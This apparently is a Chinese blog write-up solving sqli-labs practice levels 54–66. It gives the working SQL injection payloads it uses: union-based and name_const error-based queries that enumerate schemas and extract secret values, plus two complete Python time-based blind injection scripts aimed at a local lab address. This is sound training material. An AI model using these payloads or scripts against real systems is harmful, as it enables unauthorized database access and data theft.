• 【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)


    Less-54:

    ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

    • Your Password:CL0FY8NWDK

    ?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database()  and table_name='CL0FY8NWDK'--+

    • Your Login name:challenges
    • Your Password:id,sessid,secret_TOM0,tryy

    ?id=-1' union select 1,group_concat(sessid),group_concat(secret_TOM0) from CL0FY8NWDK--+

    • Your Login name:d8074a35855a7f4935e3e19222d9a9eb
    • Your Password:bgAkTAN2t9AwqzSZyXtjhag4

    有点迷,不知道这个怎么玩,反正登陆失败了,sessid和secre_TOMO都试过了Orz;

    好吧,是没看界面,它的中文意思 :“恭喜你成功了”,【话说你以前不是蓝色的嘛!!!


    Less-55:

     ?id=1) and (1 ,?id=1) and (0

    • 回显不同,小括号闭合

    ?id=0) union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+ :

    • Your Login name:MYGNMGLTYN
    • Your Password:challenges     

    ?id=0) union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

    • Your Login name:id,sessid,secret_81NP,tryy
    • Your Password:challenges
    ?id=0) union select 1,group_concat(secret_81NP),database() from MYGNMGLTYN--+
    • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
    • Your Password:challenges
    查出:
    • 56aKKaL0ZO1elWAFGWwRtGcE

    Less-56:

    ?id=1' and '0,?id=1' and '1

    • 回显不同,单引号

    ?id=2' and '1

    • 查出第一条数据,小括号闭合

    ?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

    • Your Login name:MYGNMGLTYN
    • Your Password:3

     

    ?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

    ?id=0') union select 1,group_concat(secret_81NP),3 from MYGNMGLTYN--+

    • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
    • Your Password:3

    查出:

    • 56aKKaL0ZO1elWAFGWwRtGcE


    Less-57:

    ?id=1" and "0,?id=1" and "1

    • 双引号闭合

    ?id=2" and "1

    • 回显第二条,没有小括号

    ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

    • Your Login name:2
    • Your Password:KXPI7R3J3M

    ?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+

    • Your Login name:2
    • Your Password:id,sessid,secret_24A7,tryy


    ?id=0" union select 1,2,group_concat(secret_24A7) from KXPI7R3J3M--+

    • Your Login name:2
    • Your Password:TNxWAHFGN4l1FiZOpr3F6yju

    查出:

    • TNxWAHFGN4l1FiZOpr3F6yju

    Less-58:

    ?id=1' and '1 ,?id=1' and '0

    • 单引号闭合

    ?id=2') and ('1

    • 报错,无小括号

    ?id=' union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

    • Duplicate column name 'ZQ803A690O'

    ?id=' union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

    • Duplicate column name 'id,sessid,secret_TB31,tryy'

    ?id=' union (SELECT * FROM (SELECT name_const((select group_concat(secret_TB31) from ZQ803A690O),1),name_const((select group_concat(secret_TB31) from ZQ803A690O),1)) a)--+

    • Duplicate column name '9f7VYPJeYRbMCqZ7mGZkzOlu'

    提交:

    • 9f7VYPJeYRbMCqZ7mGZkzOlu

    Less-59:

    ?id=1 and 1,?id=1 and 0

    • 数字型

    ?id=2 and 1

    • 回显第二条,无小括号

    ?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

    • Duplicate column name 'DDCETXN5RL'

    ?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

    • Duplicate column name 'id,sessid,secret_NW54,tryy'

    ?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(secret_NW54) from DDCETXN5RL),1),name_const((select group_concat(secret_NW54) from DDCETXN5RL),1)) a)--+

    • Duplicate column name '1yChO5jTqiN4t1HpROwWWTBt'

    提交:

    • 1yChO5jTqiN4t1HpROwWWTBt

    Less-60:

    ?id=2" and "0--+ ,?id=2" and "1--+

    • 双引号闭合,查出第一条无小括号

    ?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

    • Duplicate column name 'HKTX3I9V9F'

    ?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

    • Duplicate column name 'id,sessid,secret_39ZN,tryy'

    ?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1),name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1)) a)--+

    • Duplicate column name 'JGw1EIsBhUycAxCTGOmn3b23'提交:

    提交:

    • JGw1EIsBhUycAxCTGOmn3b23

    Less-61:有两个小括号Orz

    ?id=1' and '0,?id=1' and '1

    • 单引号闭合

    ?id=2' and '1

    • 小括号闭合

    ?id=-1'))union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

    • Duplicate column name 'P1EYFNKQS3'

     


     Less-62:

    ?id=1' and '0,?id=1' and '1

    • 单引号闭合

    ?id=2' and '1

    • 小括号闭合

    ?id=2' and sleep(3) and '1--+

    • 检测出来用时间盲注
    '''
    @Modify Time      @Author   
    ------------      -------    
    2019/10/10 13:03   laoalo
    '''
    # -*- coding:utf-8 -*-
    import requests
    import time
    
    url = "http://192.168.199.190/sqli-labs-master/Less-62/?id=1') "
    def database_length():
        global url
        for i in range(1,10000):
            sql = url + " and if((length(database()))>"+str(i)+",0,sleep(3)) +--+"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            print(sql)
            if(e_time-s_time) > 3:
                print("数据库长:",i)
                break
    def database_name(database_length):
        global url
        sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
        db_name = ''
        for num in range(1, database_length+1):
            for asc in range(ord('a'), ord('z') + 1):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    db_name += chr(asc)
                    print("数据库名:",db_name)
                    break
    def table_length(database_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
            s_time = time.time()
            response = requests.get(url=sql)
            e_time = time.time()
            print(sql)
            if (e_time - s_time) > 3:
                print(database_name,"中的所有数据表名长:", i)
                break
    def table_name(table_length,database_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
        table_name = ''
        for num in range(1, table_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    table_name += chr(asc)
                    print("所有的数据表名:", table_name)
                    break
    def column_length(table_name,database_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            # print(sql)
            if (e_time - s_time) > 3:
                print(table_name, "中的所有字段名长:", i)
                break
    def column_name(column_length,table_name,database_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
        table_name = ''
        for num in range(1, column_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    table_name += chr(asc)
                    print("所有的字段名:", table_name)
                    break
    def data_length(column_name,table_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            # print(sql)
            if (e_time - s_time) > 3:
                print(column_name, "字段的值长:", i)
                break
    def data_detail(data_length,column_name,table_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
        data = ''
        for num in range(1, data_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    data += chr(asc)
                    print(column_name,"字段的值:", data)
                    break
    if __name__ == '__main__':
        # database_length() #数据库长: 10
        # database_name(10) #数据库名: challenges
        # table_length('challenges')#challenges 中的所有数据表名长: 10
        # table_name(10, 'challenges')#所有的数据表名: P1EYFNKQS3
        # column_length('P1EYFNKQS3','challenges') #P1EYFNKQS3 中的所有字段名长: 26
        # column_name(26,'P1EYFNKQS3','challenges')#所有的字段名: id@sessid@secret_ZGLB@tryy
        # data_length('secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值长: 24
        data_detail(24, 'secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值: o6x95TdsyX3fTTBuJcgRIpoa
    View Code


      Less-63:

    ?id=1' and '0,?id=1' and '1

    • 单引号闭合

    ?id=1' and sleep(1) --+

    • 检测出来用时间盲注

    脚本用62的把这里改了就行

    1 url = "http://192.168.199.190/sqli-labs-master/Less-63/?id=1' "

      


     Less-64:

    ?id=1 and 0,?id=1 and 0

    • 数字型

    ?id=2 and 1

    • 返回第一条,小括号

    ?id=(1 and if((length(database())=10),sleep(1),1))

    •  select * from users where id=(1 and if((length(database())=8),sleep(1),1));  时间盲注
    '''
    @Modify Time      @Author   
    ------------      -------    
    2019/10/11 20:15   laoalo
    '''
    # -*- coding:utf-8 -*-
    import requests
    import time
    
    url = "http://192.168.199.190/sqli-labs-master/Less-64/?id=1 "
    def database_length():
        global url
        for i in range(1,10000):
            sql = url + " and if((length(database()))>"+str(i)+",0,sleep(1))"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            print(sql)
            if(e_time-s_time) > 3:
                print("数据库长:",i)
                break
    def database_name(database_length):
        global url
        sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(1)) "
        db_name = ''
        for num in range(1, database_length+1):
            for asc in range(ord('a'), ord('z') + 1):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    db_name += chr(asc)
                    print("数据库名:",db_name)
                    break
    def table_length(database_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(1)) "
            s_time = time.time()
            response = requests.get(url=sql)
            e_time = time.time()
            print(sql)
            if (e_time - s_time) > 3:
                print(database_name,"中的所有数据表名长:", i)
                break
    def table_name(table_length,database_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(1))"
        table_name = ''
        for num in range(1, table_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    table_name += chr(asc)
                    print("所有的数据表名:", table_name)
                    break
    def column_length(table_name,database_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(1))"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            # print(sql)
            if (e_time - s_time) > 3:
                print(table_name, "中的所有字段名长:", i)
                break
    def column_name(column_length,table_name,database_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(1))"
        table_name = ''
        for num in range(1, column_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    table_name += chr(asc)
                    print("所有的字段名:", table_name)
                    break
    def data_length(column_name,table_name):
        global url
        for i in range(1, 10000):
            sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(1))"
            s_time = time.time()
            requests.get(url=sql)
            e_time = time.time()
            # print(sql)
            if (e_time - s_time) > 3:
                print(column_name, "字段的值长:", i)
                break
    def data_detail(data_length,column_name,table_name):
        global url
        sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(1))"
        data = ''
        for num in range(1, data_length + 1):
            for asc in range(32, 128):
                s_time = time.time()
                requests.get(sql.format(num=num, asc=asc))
                e_time = time.time()
                if (e_time - s_time) > 3:
                    data += chr(asc)
                    print(column_name,"字段的值:", data)
                    break
    if __name__ == '__main__':
        # database_length() #数据库长: 10
        # database_name(10) #数据库名: challenges
        # table_length('challenges')#challenges 中的所有数据表名长: 10
        # table_name(10, 'challenges')# 所有的数据表名: DMQZ801XDN
        # column_length('DMQZ801XDN','challenges') #P1EYFNKQS3 中的所有字段名长: 26
        # column_name(26,'DMQZ801XDN','challenges')#所有的字段名: id@sessid@secret_PBSY@……
        # data_length('secret_PBSY', 'DMQZ801XDN')#secret_PBSY 字段的值长: 24
        data_detail(24, 'secret_PBSY', 'DMQZ801XDN')#secret_PBSY 字段的值: gSNmoKm4ctz4y……
    View Code


    Less-65:

    ?id=1" and "0,?id=1" and "0

    • 双引号闭合

    ?id=2" and "1

    • 回显第一条,小括号闭合

    ?id=2" and 1 and 1))--+,?id=2" and 1 and 0))--+ ==》select * from users where id=(("2" and 1 and 0))--+"));

    • 无回现,没有双括号

    ?id=2" and if((length(database())=10),sleep(1),1))--+

    •  时间盲注


    Less-66:

    这题先过掉,不知道为什么在我这里挂了

     查了一下我的靶场,emmm好吧,sqli-labs系列提前结束Orz

  • 相关阅读:
    [置顶] app后端设计--总目录
    Centos6.5 nginx+nginx-rtmp配置流媒体服务器
    利用nginx搭建RTMP视频点播、直播、HLS服务器
    如约而至:微信自用的移动端IM网络层跨平台组件库Mars已正式开源
    使用pngquant命令近乎无损压缩PNG图片大小减少70%左右
    字符型图片验证码识别完整过程及Python实现
    python PIL Image模块
    app后端设计(12)--图片的处理
    linux 下如何抓取HTTP流量包(httpry)
    EHcache缓存框架详解
  • 原文地址:https://www.cnblogs.com/chrysanthemum/p/11645167.html
Copyright © 2020-2023  润新知